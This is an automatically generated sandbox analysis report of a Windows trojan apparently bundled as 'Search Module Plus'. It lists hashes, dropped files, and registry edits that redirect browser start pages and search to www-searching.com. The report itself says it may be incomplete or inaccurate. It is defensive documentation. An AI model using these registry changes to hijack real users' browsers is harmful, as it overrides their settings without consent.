Gen.Variant.Kazy.746779_16f4b6f13e – Adaware

HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Variant.Kazy.746779 (B) (Emsisoft), Gen:Variant.Kazy.746779 (AdAware), mzpefinder_pcap_file.YR, GenericInjector.YR (Lavasoft MAS)Behaviour: Trojan

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

MD5: 16f4b6f13e3e20e37edf9403c894fe80

SHA1: 73429446915087ec7b4ae2cc5a68f13f9d3c0150

SHA256: 294883e4d17afba42cfd8dddbbbdca386d1ce67e25bd743e75deb07fb4c592f9

SSDeep: 24576:qTJMjonewo QkE3pGq/g8LaGCCmH/u pvFfU jEBbTr/:YeDwoFk0pfLPCCmH/dlFxEBbTr/

Size: 1085952 bytes

File type: EXE

Platform: WIN32

Entropy: Not Packed

PEID: UPolyXv05_v6

Company: no certificate found

Created at: 2015-10-10 06:19:11

Analyzed on: Windows7 SP1 32-bit

Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Dynamic Analysis

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

smu.exe:2540
smu.exe:3356
sma.exe:308
sma.exe:4008
sma.exe:3164
sma.exe:3192
%original file name%.exe:3380
%original file name%.exe:264
smp.exe:3444
smp.exe:2836
tcpsvcs.exe:3488
tcpsvcs.exe:1504

The Trojan injects its code into the following process(es):No processes have been created.

Mutexes

The following mutexes were created/opened:No objects were found.

File activity

The process smu.exe:2540 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

C:\ProgramData\SearchModulePlus\smhe.js (407 bytes)

The process smu.exe:3356 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

C:\Windows\Temp\Pre83CF.tmp (601 bytes)
C:\ProgramData\SearchModulePlus\smhe.js (407 bytes)
C:\Windows\Temp\Pre93AB.tmp (601 bytes)
C:\Windows\Temp\Web93AC.tmp (63 bytes)
C:\Windows\Temp\Pre83E0.tmp (601 bytes)
C:\Windows\Temp\Web83D0.tmp (63 bytes)
C:\Windows\Temp\Web83E1.tmp (63 bytes)

The Trojan deletes the following file(s):

C:\Windows\Temp\Pre93AB.tmp (0 bytes)
C:\Windows\Temp\Pre83CF.tmp (0 bytes)
C:\Windows\Temp\Pre83E0.tmp (0 bytes)

The process %original file name%.exe:3380 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Installer\Install_13704\%original file name%.exe (7433 bytes)

The process %original file name%.exe:264 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Installer\Installytd_6828\%original file name%.exe (7433 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Install_22888\bxsdk32.dll (1192 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Installer\Install_9822\%original file name%.exe (7433 bytes)

The process smp.exe:3444 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk (2 bytes)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Search.lnk (2 bytes)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk (1 bytes)

The process smp.exe:2836 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Search.lnk (1 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\Search.lnk (1 bytes)

The process tcpsvcs.exe:3488 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\5a2ce8gs.default\search-metadata.json (95 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Preferences (11028 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\5a2ce8gs.default\searchplugins\smod.xml (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences (9416 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\5a2ce8gs.default\prefs.js (388 bytes)

The process tcpsvcs.exe:1504 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Program Files%\Common Files\Goobzo\GBUpdatePlus\SMUninstall.exe (10136 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\sma.exe (8560 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\ns715C.tmp (14 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\SBIEBrowserHelperObject.dll (3312 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\ns8C5D.tmp (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\nsExec.dll (14 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\smci32.dll (45051 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\System.dll (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\ns85B7.tmp (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\AccD.dll (7392 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\Updater.exe (25776 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\ns96D9.tmp (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\nsProcess.dll (12 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\rlz_id.dll (3616 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\smi32.exe (12088 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\smu.exe (56684 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF8.tmp (245963 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\smw.sys (784 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\smp.exe (6584 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EFA.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\ns8C5D.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\nsExec.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\System.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\ns85B7.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsc6EE8.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\AccD.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\ns96D9.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\nsProcess.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\ns715C.tmp (0 bytes)

Registry activity

The process smu.exe:2540 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\smu_RASMANCS]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\smu_RASAPI32]
"MaxFileSize" = "1048576"
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\SearchModulePlus\SMUpdPlus]
"Scf" = "40 CB 63 41 C7 74 17 84 EA 5E F9 24 AE E1 DA 8A"

[HKLM\SOFTWARE\Microsoft\Tracing\smu_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\smu_RASAPI32]
"FileTracingMask" = "4294901760"
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\smu_RASMANCS]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\smu_RASAPI32]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\smu_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Wow6432Node\SearchModulePlus\SMUpdPlus\Users\Default]
"Ucf" = "AF 19 06 18 24 A7 78 A7 83 2B E1 77 84 81 A9 3B"

[HKLM\SOFTWARE\SearchModulePlus\SMUpdPlus\Users\Default]
"Spt" = "1B 39 48 C8 E0 BD 90 00 51 86 E1 DD 14 43 97 BC"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3F 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\SearchModulePlus\SMUpdPlus]
"Gcf" = "80 46 55 E5 90 D4 4A C0 31 0A 29 D6 59 11 73 09"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\smu_RASAPI32]
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\smu_RASMANCS]
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\SearchModulePlus\SMUpdPlus\Users\Default]
"Ucf" = "AF 19 06 18 24 A7 78 A7 83 2B E1 77 84 81 A9 3B"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

The process smu.exe:3356 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\SearchModulePlus\SMUpdPlus]
"Rlt" = "Type: REG_QWORD, Length: 8"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 03 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\SearchModulePlus\SMUpdPlus]
"Scf" = "46 A0 C0 5B 56 BA 84 71 70 9D 4F 8D 92 7C EE 47"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"LoadAppInit_DLLs" = "0"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "46 00 00 00 03 00 00 00 09 00 00 00 00 00 00 00"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\SearchModulePlus\SMUpdPlus]
"Ult" = "Type: REG_QWORD, Length: 8"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
"ProxyBypass"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process sma.exe:308 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 04 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\sma_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\sma_RASMANCS]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\sma_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\sma_RASMANCS]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\sma_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\sma_RASMANCS]
"ConsoleTracingMask" = "4294901760"
"EnableFileTracing" = "0"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\sma_RASAPI32]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\sma_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\sma_RASAPI32]
"FileTracingMask" = "4294901760"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

The process sma.exe:4008 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 07 00 00 00 09 00 00 00 00 00 00 00"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

The process sma.exe:3164 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 06 00 00 00 09 00 00 00 00 00 00 00"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

The process sma.exe:3192 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 05 00 00 00 09 00 00 00 00 00 00 00"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

The process %original file name%.exe:3380 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\16f4b6f13e3e20e37edf9403c894fe80_RASMANCS]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\16f4b6f13e3e20e37edf9403c894fe80_RASAPI32]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad]
"WpadLastNetwork" = "{E549E976-C5F2-4E77-819D-55BC9B7C25BC}"

[HKLM\SOFTWARE\Microsoft\Tracing\16f4b6f13e3e20e37edf9403c894fe80_RASAPI32]
"EnableConsoleTracing" = "0"
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "46 00 00 00 0C 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\16f4b6f13e3e20e37edf9403c894fe80_RASMANCS]
"MaxFileSize" = "1048576"
"FileTracingMask" = "4294901760"

[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E]
"LanguageList" = "en-US, en"

[HKLM\SOFTWARE\Microsoft\Tracing\16f4b6f13e3e20e37edf9403c894fe80_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\16f4b6f13e3e20e37edf9403c894fe80_RASAPI32]
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3C 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\16f4b6f13e3e20e37edf9403c894fe80_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\16f4b6f13e3e20e37edf9403c894fe80_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\16f4b6f13e3e20e37edf9403c894fe80_RASMANCS]
"EnableFileTracing" = "0"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

The process %original file name%.exe:264 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E]
"LanguageList" = "en-US, en"

[HKLM\SOFTWARE\SearchModulePlus\Success]
"Install" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3D 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\SearchModulePlus\Success]
"InstallStr" = "ok"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MaxConnectionsPerServer" = "2"
"MaxConnectionsPer1_0Server" = "2"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

The process smp.exe:3444 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E]
"LanguageList" = "en-US, en"

The process smp.exe:2836 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Taskband]
"FavoritesVersion" = "2"
"Favorites" = "00 7C 01 00 00 14 00 1F 80 C8 27 34 1F 10 5C 10"

[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E]
"@zipfldr.dll,-10148" = "Compressed (zipped) folder"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Taskband]
"FavoritesChanges" = "9"

[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@C:\Windows\system32]
"FXSRESM.dll,-120" = "Fax recipient"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Taskband]
"FavoritesResolve" = "CC 02 00 00 4C 00 00 00 01 14 02 00 00 00 00 00"

[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E]
"LanguageList" = "en-US, en"
"@sendmail.dll,-21" = "Desktop (create shortcut)"
"@sendmail.dll,-4" = "Mail recipient"

The process tcpsvcs.exe:3488 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\ins_U501EXE_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{034127AD-1C9F-4882-9EA1-FA0972B48B08}]
"FaviconURLFallback" = "http://www.bing.com/favicon.ico"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"TopResultURL" = "http://www-searching.com/search.aspx?s=FAAzamodk0,99999999-9999-4180-88c6-7a076893e507&site=shyosie&prd=set&q={searchTerms}"
"URL" = "http://www-searching.com/search.aspx?s=FAAzamodk0,99999999-9999-4180-88c6-7a076893e507&site=shyosie&prd=set&q={searchTerms}"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{034127AD-1C9F-4882-9EA1-FA0972B48B08}]
"(Default)" = "Type: REG_SZ, Length: 0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\ins_U501EXE_RASAPI32]
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\ins_U501EXE_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{034127AD-1C9F-4882-9EA1-FA0972B48B08}]
"FaviconPath" = "C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"TopResultURLFallback" = "http://www-searching.com/search.aspx?s=FAAzamodk0,99999999-9999-4180-88c6-7a076893e507&site=shyosie&prd=set&q={searchTerms}"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{034127AD-1C9F-4882-9EA1-FA0972B48B08}]
"SuggestionsURLFallback" = "http://api.bing.com/qsml.aspx?query={searchTerms}&maxwidth={ie:maxWidth}&rowheight={ie:rowHeight}&sectionHeight={ie:sectionHeight}&FORM=IE8SSC&market={language}"

[HKLM\SOFTWARE\Microsoft\Tracing\ins_U501EXE_RASAPI32]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"DisplayName" = "Search Module"

[HKLM\SOFTWARE\Microsoft\Tracing\ins_U501EXE_RASMANCS]
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{034127AD-1C9F-4882-9EA1-FA0972B48B08}]
"DisplayName" = "Bing"

[HKLM\SOFTWARE\Microsoft\Tracing\ins_U501EXE_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{034127AD-1C9F-4882-9EA1-FA0972B48B08}]
"URL" = "http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IE8SRC"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"SuggestionsURLFallback" = "http://api.searchpredict.com/api/?rqtype=ffplugin&siteID=8661&dbCode=1&command={searchTerms}"

[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E]
"LanguageList" = "en-US, en"

[HKLM\SOFTWARE\Microsoft\Tracing\ins_U501EXE_RASMANCS]
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3E 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{034127AD-1C9F-4882-9EA1-FA0972B48B08}]
"TopResultURLFallback" = "http://www.bing.com/search?q={searchTerms}&src=ie9tr"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Start Page" = "http://www-searching.com/?pid=s&s=FAAzamodk0,99999999-9999-4180-88c6-7a076893e507&vp=ch&prd=set"

[HKLM\SOFTWARE\Microsoft\Tracing\ins_U501EXE_RASMANCS]
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"FaviconURLFallback" = "http://www-searching.com/favicon.ico"
"SuggestionsURL" = "http://api.searchpredict.com/api/?rqtype=ffplugin&siteID=8661&dbCode=1&command={searchTerms}"
"FaviconURL" = "http://www-searching.com/favicon.ico"

[HKLM\SOFTWARE\Microsoft\Tracing\ins_U501EXE_RASAPI32]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\ins_U501EXE_RASMANCS]
"ConsoleTracingMask" = "4294901760"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following registry key(s):

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]

The Trojan deletes the following value(s) in system registry:

The process tcpsvcs.exe:1504 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\SearchModulePlus\Info]
"Version" = "2.3.12.1634"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\smu.exe]
"Plus" = "1"
"(Default)" = "%Program Files%\Common Files\Goobzo\GBUpdatePlus\smu.exe"

[HKLM\SOFTWARE\SearchModulePlus\Info]
"ExeLocation" = "%Program Files%\Common Files\Goobzo\GBUpdatePlus\smu.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Search Module Plus]
"DisplayIcon" = "%Program Files%\Common Files\Goobzo\GBUpdatePlus\smUninstall.exe"
"UninstallString" = "%Program Files%\Common Files\Goobzo\GBUpdatePlus\smUninstall.exe"
"DisplayName" = "Search Module Plus"
"Publisher" = "Goobzo"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\SearchModulePlus\Info]
"Aff" = "FAAzamodk0,99999999-9999-4180-88c6-7a076893e507,"
"UserId" = "732923889-1296844034-1208581001"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\smu.exe]
"Install" = "%Program Files%\Common Files\Goobzo\GBUpdatePlus"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

Dropped PE files

MD5	File path
c5bf0ea484893a959b3ef0e7f041f379	c:\Program Files\Common Files\Goobzo\GBUpdatePlus\SBIEBrowserHelperObject.dll
29f111a07a51d38b8379171d3cf39ddb	c:\Program Files\Common Files\Goobzo\GBUpdatePlus\SMUninstall.exe
2dd50829f5ce91e033636553405263ca	c:\Program Files\Common Files\Goobzo\GBUpdatePlus\Updater.exe
